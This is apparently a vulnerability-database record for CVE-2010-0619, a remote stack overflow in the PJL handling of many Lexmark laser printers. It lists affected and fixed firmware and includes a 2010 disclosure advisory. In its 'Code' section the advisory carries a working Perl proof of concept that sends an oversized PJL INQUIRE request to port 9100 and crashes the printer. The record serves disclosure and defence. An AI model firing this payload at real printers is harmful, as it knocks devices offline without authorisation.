ID

VAR-E-201003-0212


CVE

cve_id:CVE-2010-0619

Trust: 2.4

sources: BID: 38901 // PACKETSTORM: 87559 // EXPLOIT-DB: 11880 // EDBNET: 35514

EDB ID

11880


TITLE

Lexmark Multiple Laser printers - Remote Stack Overflow - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 11880

DESCRIPTION

Lexmark Multiple Laser printers - Remote Stack Overflow. CVE-2010-0619CVE-63164 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 11880

AFFECTED PRODUCTS

vendor:lexmarkmodel:multiple laser printersscope: - version: -

Trust: 1.0

vendor:lexmarkmodel:laser printerscope: - version: -

Trust: 0.5

vendor:lexmarkmodel:lc.br.p049scope:eqversion:x94x

Trust: 0.3

vendor:lexmarkmodel:lp.sp.p112scope:eqversion:x86x

Trust: 0.3

vendor:lexmarkmodel:lc4.be.p457scope:eqversion:x85x

Trust: 0.3

vendor:lexmarkmodel:x782e lc2.to.p305cscope: - version: -

Trust: 0.3

vendor:lexmarkmodel:x772e lc2.tr.p275scope: - version: -

Trust: 0.3

vendor:lexmarkmodel:lr.fl.p224bscope:eqversion:x73x

Trust: 0.3

vendor:lexmarkmodel:lr.mn.p224ascope:eqversion:x65x

Trust: 0.3

vendor:lexmarkmodel:x64xef lc2.ti.p305ascope: - version: -

Trust: 0.3

vendor:lexmarkmodel:lc2.mc.p307ascope:eqversion:x646

Trust: 0.3

vendor:lexmarkmodel:lc2.mc.p307ascope:eqversion:x644

Trust: 0.3

vendor:lexmarkmodel:lc2.mb.p307bscope:eqversion:x642

Trust: 0.3

vendor:lexmarkmodel:ll.el.p424scope:eqversion:x546

Trust: 0.3

vendor:lexmarkmodel:ll.el.p424scope:eqversion:x544

Trust: 0.3

vendor:lexmarkmodel:ll.el.p424scope:eqversion:x543

Trust: 0.3

vendor:lexmarkmodel:lr.bs.p224ascope:eqversion:x46x

Trust: 0.3

vendor:lexmarkmodel:ll.bz.p424scope:eqversion:x36x

Trust: 0.3

vendor:lexmarkmodel:lm1.mt.p110hscope:eqversion:x264

Trust: 0.3

vendor:lexmarkmodel:w850 lp.jb.p108wsscope: - version: -

Trust: 0.3

vendor:lexmarkmodel:w840 ls.ha.p121scope: - version: -

Trust: 0.3

vendor:lexmarkmodel:t656 lsj.sj.p019scope: - version: -

Trust: 0.3

vendor:lexmarkmodel:t654 lr.jp.p224ascope: - version: -

Trust: 0.3

vendor:lexmarkmodel:t652 lr.jp.p224ascope: - version: -

Trust: 0.3

vendor:lexmarkmodel:t650 lr.jp.p224ascope: - version: -

Trust: 0.3

vendor:lexmarkmodel:t64x ls.st.p240scope: - version: -

Trust: 0.3

vendor:lexmarkmodel:e462 lr.lbh.p224cwsscope: - version: -

Trust: 0.3

vendor:lexmarkmodel:e460 lr.lbh.p224ascope: - version: -

Trust: 0.3

vendor:lexmarkmodel:e450 lm.sz.p113vcrefscope: - version: -

Trust: 0.3

vendor:lexmarkmodel:e360dn ll.lbm.p424scope: - version: -

Trust: 0.3

vendor:lexmarkmodel:e360d ll.lbl.p424scope: - version: -

Trust: 0.3

vendor:lexmarkmodel:e260 ll.lbl.p424scope: - version: -

Trust: 0.3

vendor:lexmarkmodel:c935dn lc.jo.p051scope: - version: -

Trust: 0.3

vendor:lexmarkmodel:c920 ls.ta.p127scope: - version: -

Trust: 0.3

vendor:lexmarkmodel:c78x lc.io.p165ascope: - version: -

Trust: 0.3

vendor:lexmarkmodel:c77x lc.cm.p027bscope: - version: -

Trust: 0.3

vendor:lexmarkmodel:c73x lr.sk.p224ascope: - version: -

Trust: 0.3

vendor:lexmarkmodel:c546 lu.as.p424scope: - version: -

Trust: 0.3

vendor:lexmarkmodel:c544 ll.as.p424scope: - version: -

Trust: 0.3

vendor:lexmarkmodel:c543 ll.as.p424scope: - version: -

Trust: 0.3

vendor:lexmarkmodel:c540 ll.as.p424scope: - version: -

Trust: 0.3

vendor:lexmarkmodel:c53x ls.sw.p026avcscope: - version: -

Trust: 0.3

vendor:lexmarkmodel:c52x ls.fa.p129scope: - version: -

Trust: 0.3

vendor:lexmarkmodel:lc.br.p051hds1scope:neversion:x94x

Trust: 0.3

vendor:lexmarkmodel:lc.br.p051hdsscope:neversion:x94x

Trust: 0.3

vendor:lexmarkmodel:lp.lp.p311hscope:neversion:x86x

Trust: 0.3

vendor:lexmarkmodel:lp.lp.p311escope:neversion:x86x

Trust: 0.3

vendor:lexmarkmodel:lc4.be.p457s1scope:neversion:x85x

Trust: 0.3

vendor:lexmarkmodel:lc4.be.p457sscope:neversion:x85x

Trust: 0.3

vendor:lexmarkmodel:x782e lc2.to.p305cs1scope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:x782e lc2.to.p305csscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:x772e lc2.tr.p275s1scope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:x772e lc2.tr.p275sscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:lr.fl.p311hscope:neversion:x73x

Trust: 0.3

vendor:lexmarkmodel:lr.fl.p311escope:neversion:x73x

Trust: 0.3

vendor:lexmarkmodel:lr.mn.p311hscope:neversion:x65x

Trust: 0.3

vendor:lexmarkmodel:lr.mn.p311escope:neversion:x65x

Trust: 0.3

vendor:lexmarkmodel:x64xef lc2.ti.p305as1scope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:x64xef lc2.ti.p305asscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:lc2.mc.p307as1scope:neversion:x646

Trust: 0.3

vendor:lexmarkmodel:lc2.mc.p307asscope:neversion:x646

Trust: 0.3

vendor:lexmarkmodel:lc2.mc.p307as1scope:neversion:x644

Trust: 0.3

vendor:lexmarkmodel:lc2.mc.p307asscope:neversion:x644

Trust: 0.3

vendor:lexmarkmodel:lc2.mb.p307bs1scope:neversion:x642

Trust: 0.3

vendor:lexmarkmodel:lc2.mb.p307bsscope:neversion:x642

Trust: 0.3

vendor:lexmarkmodel:ll.el.p429ascope:neversion:x546

Trust: 0.3

vendor:lexmarkmodel:ll.el.p429ascope:neversion:x544

Trust: 0.3

vendor:lexmarkmodel:ll.el.p429ascope:neversion:x543

Trust: 0.3

vendor:lexmarkmodel:lr.bs.p311hscope:neversion:x46x

Trust: 0.3

vendor:lexmarkmodel:lr.bs.p311escope:neversion:x46x

Trust: 0.3

vendor:lexmarkmodel:ll.bz.p429ascope:neversion:x36x

Trust: 0.3

vendor:lexmarkmodel:lm1.mt.p214scope:neversion:x264

Trust: 0.3

vendor:lexmarkmodel:w850 lp.jb.p311hscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:w850 lp.jb.p311escope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:w840 ls.ha.p236lpcsscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:w840 ls.ha.p225sscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:w840 ls.ha.p121s1scope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:w840 ls.ha.p121sscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:w840 ld.ha.fm139sscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:w840 ld.ha.bc104sscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:t656 lsj.sj.p019sscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:t654 lr.jp.p311hscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:t654 lr.jp.p311escope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:t652 lr.jp.p311hscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:t652 lr.jp.p311escope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:t650 lr.jp.p311hscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:t650 lr.jp.p311escope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:t64x ls.st.p240s1scope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:t64x ls.st.p240sscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:t64x ls.st.p240lpcsscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:t64x ld.st.fm152sscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:e462 lr.lbh.p311hscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:e462 lr.lbh.p311escope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:e460 lr.lbh.p311hscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:e460 lr.lbh.p311escope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:e450 lm.sz.p113vcres1scope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:e450 lm.sz.p113vcresscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:e360dn ll.lbm.p429ascope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:e360d ll.lbl.p429ascope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:e260 ll.lbl.p429ascope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c935dn lc.jo.p051s1scope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c935dn lc.jo.p051sscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c920 ls.ta.p127sscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c920 ls.ta.p127lpcsscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c920 ls.ta.p127epsscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c920 ld.ta.fm130sscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c920 ld.ta.bc109sscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c78x lc.io.p165as1scope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c78x lc.io.p165asscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c77x lc.cm.p027bs1scope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c77x lc.cm.p027bsscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c77x lc.cm.p027blpcsscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c73x lr.sk.p311hscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c73x lr.sk.p311escope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c546 lu.as.p429ascope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c544 ll.as.p429ascope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c543 ll.as.p429ascope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c540 ll.as.p429ascope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c53x ls.sw.p027lpcsscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c53x ls.sw.p026avcs1scope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c53x ls.sw.p026avcsscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c52x ls.fa.p129s1scope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c52x ls.fa.p129sscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c52x ls.fa.p129lpcsscope:neversion: -

Trust: 0.3

vendor:lexmarkmodel:c52x ld.fa.fm131sscope:neversion: -

Trust: 0.3

sources: BID: 38901 // PACKETSTORM: 87559 // EXPLOIT-DB: 11880

EXPLOIT

#####################################################################################

Application: Lexmark Multiple Laser printer Remote Stack Overflow

Platforms: Lexmark Multiple Laser printer

Exploitation: Remote Exploitable

CVE Number: CVE-2010-0619

Discover Date: 2010-01-06

Author: Francis Provencher (Protek Research Lab's)

Website: http://www.protekresearchlab.com

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code

#####################################################################################

=================
1) Introduction
=================

Lexmark specializes in printers and printer accessories. Its current range of products includes color and monochrome laser printers and inkjet printers, both of which may include scanners (including all-in-one devices with faxing and copying capabilities and photo printers), and dot matrix printers. Lexmark was one of the first companies to release wifi inkjet printers and the very first to release printers with a web-enabled touchscreen, coming in early September of 2009. They also offer a wide variety of laser printers with software solutions for more professional printing environments.

(Wikipedia)
#####################################################################################

====================
2) Report Timeline
====================

2010-01-06 Vendor Contacted
2010-01-09 Vendor Response
2010-01-09 Vendor request a PoC
2010-01-10 PoC is sent to the vendor
2010-01-12 Vendor confirme they received PoC
2010-01-13 Vendor confirm the vulnerability
2010-03-22 Public release of this advisory

#####################################################################################

======================
3) Technical details
======================

Multiple Lexmark Laser Printers contain remote buffer overflow vulnerabilities in their PJL processing
functionality. These vulnerabilities could lead to remote code execution on the printer without authentication. Device freezes when a specialy PLJ request is sent to the daemon with an invalid argument on PJL INQUIRE command.

#####################################################################################

=====================
4) Product affected
=====================

The list is too long, you can found information on the Lexmark web site;

http://support.lexmark.com/alerts

#####################################################################################

=============
5) The Code
=============

#!/usr/bin/perl -w
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Lexmark Multiple Laser Printer Remote Buffer Overflow PoC
#
# This PoC will completly DoS the printer and all is services, Use it at your own risk.
#

use IO::Socket;
if (@ARGV < 1){
exit
}
$ip = $ARGV[0];
#open the socket
my $sock = new IO::Socket::INET (
PeerAddr => $ip,
PeerPort => '9100',
Proto => 'tcp',
);

$sock or die "no socket :$!";
send($sock, "\033%-12345X\@PJL INQUIRE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n",0);

close $sock;

#####################################################################################
(PRL-2010-01)

Trust: 1.0

sources: EXPLOIT-DB: 11880

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 11880

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 11880

TYPE

Remote Stack Overflow

Trust: 1.0

sources: EXPLOIT-DB: 11880

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:overflow

Trust: 0.5

tag:proof of concept

Trust: 0.5

sources: PACKETSTORM: 87559

CREDITS

Francis Provencher

Trust: 0.6

sources: EXPLOIT-DB: 11880

EXTERNAL IDS

db:NVDid:CVE-2010-0619

Trust: 2.4

db:EXPLOIT-DBid:11880

Trust: 1.6

db:EDBNETid:35514

Trust: 0.6

db:PACKETSTORMid:87559

Trust: 0.5

db:BIDid:38901

Trust: 0.3

sources: BID: 38901 // PACKETSTORM: 87559 // EXPLOIT-DB: 11880 // EDBNET: 35514

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2010-0619

Trust: 2.1

url:https://www.exploit-db.com/exploits/11880/

Trust: 0.6

url:http://support.lexmark.com/index?page=content&id=te84&locale=en&userlocale=en_us

Trust: 0.3

url:http://www.lexmark.com/

Trust: 0.3

sources: BID: 38901 // PACKETSTORM: 87559 // EXPLOIT-DB: 11880 // EDBNET: 35514

SOURCES

db:BIDid:38901
db:PACKETSTORMid:87559
db:EXPLOIT-DBid:11880
db:EDBNETid:35514

LAST UPDATE DATE

2022-07-27T09:43:25.084000+00:00


SOURCES UPDATE DATE

db:BIDid:38901date:2010-03-23T00:00:00

SOURCES RELEASE DATE

db:BIDid:38901date:2010-03-23T00:00:00
db:PACKETSTORMid:87559date:2010-03-23T22:28:09
db:EXPLOIT-DBid:11880date:2010-03-25T00:00:00
db:EDBNETid:35514date:2010-03-25T00:00:00